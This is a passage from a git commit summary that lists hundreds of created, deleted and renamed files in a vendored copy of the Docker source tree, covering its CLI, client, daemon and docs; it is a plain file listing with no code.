mode 100644 vendor/github.com/docker/docker/cli/command/stack/ps.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/services.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/init.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join_token.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/leave.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/update.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/df.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/events.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/info.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/version.go delete mode 100644 vendor/github.com/docker/docker/cli/command/task/print.go delete mode 100644 vendor/github.com/docker/docker/cli/command/trust.go delete mode 100644 vendor/github.com/docker/docker/cli/command/utils.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/create.go delete mode 100644 
vendor/github.com/docker/docker/cli/command/volume/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example1.env delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example2.env delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/full-example.yml delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/bindata.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/template/template.go delete mode 100644 
vendor/github.com/docker/docker/cli/compose/template/template_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/types/types.go create mode 100644 vendor/github.com/docker/docker/cli/config/configdir.go create mode 100644 vendor/github.com/docker/docker/cli/debug/debug.go rename vendor/github.com/docker/docker/{utils => cli/debug}/debug_test.go (71%) delete mode 100644 vendor/github.com/docker/docker/cli/flags/client.go delete mode 100644 vendor/github.com/docker/docker/cli/flags/common_test.go delete mode 100644 vendor/github.com/docker/docker/cli/trust/trust.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/config.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/config_test.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file_test.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/credentials.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go create mode 100644 vendor/github.com/docker/docker/client/build_cancel.go create mode 100644 vendor/github.com/docker/docker/client/build_prune.go create mode 
100644 vendor/github.com/docker/docker/client/config_create.go create mode 100644 vendor/github.com/docker/docker/client/config_create_test.go create mode 100644 vendor/github.com/docker/docker/client/config_inspect.go create mode 100644 vendor/github.com/docker/docker/client/config_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/config_list.go create mode 100644 vendor/github.com/docker/docker/client/config_list_test.go create mode 100644 vendor/github.com/docker/docker/client/config_remove.go create mode 100644 vendor/github.com/docker/docker/client/config_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/config_update.go create mode 100644 vendor/github.com/docker/docker/client/config_update_test.go create mode 100644 vendor/github.com/docker/docker/client/container_prune_test.go create mode 100644 vendor/github.com/docker/docker/client/disk_usage_test.go create mode 100644 vendor/github.com/docker/docker/client/distribution_inspect.go create mode 100644 vendor/github.com/docker/docker/client/distribution_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/hijack_test.go create mode 100644 vendor/github.com/docker/docker/client/image_prune_test.go create mode 100644 vendor/github.com/docker/docker/client/network_prune_test.go create mode 100644 vendor/github.com/docker/docker/client/ping_test.go create mode 100644 vendor/github.com/docker/docker/client/session.go create mode 100644 vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_unlock_test.go create mode 100644 vendor/github.com/docker/docker/client/task_logs.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go delete mode 100644 
vendor/github.com/docker/docker/cmd/docker/daemon_unix.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_test.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_windows.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_unix.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_windows.go delete mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go rename vendor/github.com/docker/docker/{cli/flags/common.go => cmd/dockerd/options.go} (56%) create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/options_test.go create mode 100644 vendor/github.com/docker/docker/codecov.yml delete mode 100644 vendor/github.com/docker/docker/container/container_linux.go delete mode 100644 vendor/github.com/docker/docker/container/container_notlinux.go create mode 100644 vendor/github.com/docker/docker/container/env.go rename vendor/github.com/docker/docker/{utils/utils_test.go => container/env_test.go} (56%) delete mode 100644 vendor/github.com/docker/docker/container/state_solaris.go delete mode 100644 vendor/github.com/docker/docker/container/state_unix.go delete mode 100644 vendor/github.com/docker/docker/container/state_windows.go create mode 100644 vendor/github.com/docker/docker/container/stream/attach.go create mode 100644 vendor/github.com/docker/docker/container/view.go create mode 100644 vendor/github.com/docker/docker/container/view_test.go delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh delete mode 100755 
vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh delete mode 100755 
vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md delete mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/completion/REVIEWERS delete mode 100644 vendor/github.com/docker/docker/contrib/completion/bash/docker delete mode 100644 vendor/github.com/docker/docker/contrib/completion/fish/docker.fish delete mode 100644 vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt delete mode 100644 
vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS delete mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/_docker create mode 100755 vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh delete mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-busybox.sh delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-rinse.sh delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage/solaris delete mode 100755 vendor/github.com/docker/docker/contrib/project-stats.sh delete mode 100755 vendor/github.com/docker/docker/contrib/reprepro/suites.sh delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc delete mode 100644 
vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go delete mode 100644 vendor/github.com/docker/docker/daemon/bindmount_solaris.go rename vendor/github.com/docker/docker/daemon/caps/{utils_unix.go => utils.go} (84%) create mode 100644 vendor/github.com/docker/docker/daemon/cluster/configs.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/config.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go create mode 100644 
vendor/github.com/docker/docker/daemon/cluster/filters_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/networks.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/noderunner.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/nodes.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/services.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/swarm.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/tasks.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/utils.go rename vendor/github.com/docker/docker/daemon/{ => config}/config.go (60%) create mode 100644 vendor/github.com/docker/docker/daemon/config/config_common_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_windows_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config/opts.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_common_unix.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_experimental.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_unix.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_unix_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_windows.go delete mode 100644 
vendor/github.com/docker/docker/daemon/config_windows_test.go create mode 100644 vendor/github.com/docker/docker/daemon/configs.go create mode 100644 vendor/github.com/docker/docker/daemon/configs_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/configs_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/configs_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/container_linux.go delete mode 100644 vendor/github.com/docker/docker/daemon/container_operations_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/container_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/container_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/create_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/daemon_experimental.go delete mode 100644 vendor/github.com/docker/docker/daemon/daemon_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_windows_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/debugtrap.go create mode 100644 vendor/github.com/docker/docker/daemon/dependency.go rename vendor/github.com/docker/docker/daemon/{ => discovery}/discovery.go (83%) create mode 100644 vendor/github.com/docker/docker/daemon/discovery/discovery_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/discovery_test.go create mode 100644 vendor/github.com/docker/docker/daemon/exec_linux_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/exec_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/getsize_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/device_setup.go delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go create mode 100644 
vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/image.go delete mode 100644 vendor/github.com/docker/docker/daemon/image_tag.go create mode 100644 vendor/github.com/docker/docker/daemon/images/cache.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image_builder.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image_commit.go rename 
vendor/github.com/docker/docker/daemon/{ => images}/image_delete.go (72%) create mode 100644 vendor/github.com/docker/docker/daemon/images/image_events.go rename vendor/github.com/docker/docker/daemon/{ => images}/image_exporter.go (61%) rename vendor/github.com/docker/docker/daemon/{ => images}/image_history.go (60%) rename vendor/github.com/docker/docker/daemon/{import.go => images/image_import.go} (60%) rename vendor/github.com/docker/docker/daemon/{ => images}/image_inspect.go (53%) create mode 100644 vendor/github.com/docker/docker/daemon/images/image_prune.go rename vendor/github.com/docker/docker/daemon/{ => images}/image_pull.go (50%) rename vendor/github.com/docker/docker/daemon/{ => images}/image_push.go (60%) rename vendor/github.com/docker/docker/daemon/{search.go => images/image_search.go} (66%) rename vendor/github.com/docker/docker/daemon/{search_test.go => images/image_search_test.go} (97%) create mode 100644 vendor/github.com/docker/docker/daemon/images/image_tag.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image_windows.go rename vendor/github.com/docker/docker/daemon/{ => images}/images.go (71%) create mode 100644 vendor/github.com/docker/docker/daemon/images/locals.go create mode 100644 vendor/github.com/docker/docker/daemon/images/service.go create mode 100644 vendor/github.com/docker/docker/daemon/info_unix_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go rename vendor/github.com/docker/docker/daemon/{inspect_unix.go => inspect_linux.go} (78%) delete mode 100644 vendor/github.com/docker/docker/daemon/inspect_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/links_linux.go delete mode 100644 vendor/github.com/docker/docker/daemon/links_linux_test.go delete mode 100644 
vendor/github.com/docker/docker/daemon/links_notlinux.go create mode 100644 vendor/github.com/docker/docker/daemon/list_test.go create mode 100644 vendor/github.com/docker/docker/daemon/listeners/group_unix.go rename vendor/github.com/docker/docker/{pkg/listeners/listeners_unix.go => daemon/listeners/listeners_linux.go} (75%) rename vendor/github.com/docker/docker/{pkg => daemon}/listeners/listeners_windows.go (94%) create mode 100644 vendor/github.com/docker/docker/daemon/logger/adapter.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/adapter_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go rename vendor/github.com/docker/docker/{pkg => daemon/logger/jsonfilelog}/jsonlog/jsonlogbytes.go (76%) create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go rename vendor/github.com/docker/docker/{pkg/ioutils => daemon/logger/loggerutils/multireader}/multireader.go (92%) rename vendor/github.com/docker/docker/{pkg/ioutils => daemon/logger/loggerutils/multireader}/multireader_test.go (91%) delete mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go rename 
vendor/github.com/docker/docker/daemon/logger/{context.go => loginfo.go} (54%) create mode 100644 vendor/github.com/docker/docker/daemon/logger/metrics.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/proxy.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/ring.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/ring_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/templates/templates.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go create mode 100644 vendor/github.com/docker/docker/daemon/metrics_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/metrics_unsupported.go delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_linux.go delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_windows.go rename vendor/github.com/docker/docker/{utils => daemon/names}/names.go (86%) create mode 100644 vendor/github.com/docker/docker/daemon/oci.go create mode 100644 vendor/github.com/docker/docker/daemon/oci_linux_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/oci_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/reload.go create mode 100644 vendor/github.com/docker/docker/daemon/reload_test.go create mode 100644 vendor/github.com/docker/docker/daemon/reload_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/reload_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/resize_test.go create mode 100644 vendor/github.com/docker/docker/daemon/secrets_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/stats/collector.go 
rename vendor/github.com/docker/docker/daemon/{stats_collector_unix.go => stats/collector_unix.go} (69%) create mode 100644 vendor/github.com/docker/docker/daemon/stats/collector_windows.go delete mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_windows.go rename vendor/github.com/docker/docker/{api/fixtures => daemon/testdata}/keyfile (100%) create mode 100644 vendor/github.com/docker/docker/daemon/trustkey.go create mode 100644 vendor/github.com/docker/docker/daemon/trustkey_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/update_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/util_test.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_linux_test.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unix_test.go create mode 100644 vendor/github.com/docker/docker/distribution/errors_test.go delete mode 100644 vendor/github.com/docker/docker/docs/README.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/README.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/contributor-edit.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/copy_url.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/fork_docker.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/git_bash.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/list_example.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/set-up-git.md create mode 100644 
vendor/github.com/docker/docker/docs/contributing/software-req-win.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/software-required.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/test.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/who-written-for.md delete mode 100644 vendor/github.com/docker/docker/docs/deprecated.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/EBS_volume.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/config.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_allow.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_chunked.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_connection_hijack.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_deny.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/index.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/legacy_plugins.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugin_api.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_authorization.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_network.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_volume.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/builder.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/attach.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/build.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cli.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/commit.md delete 
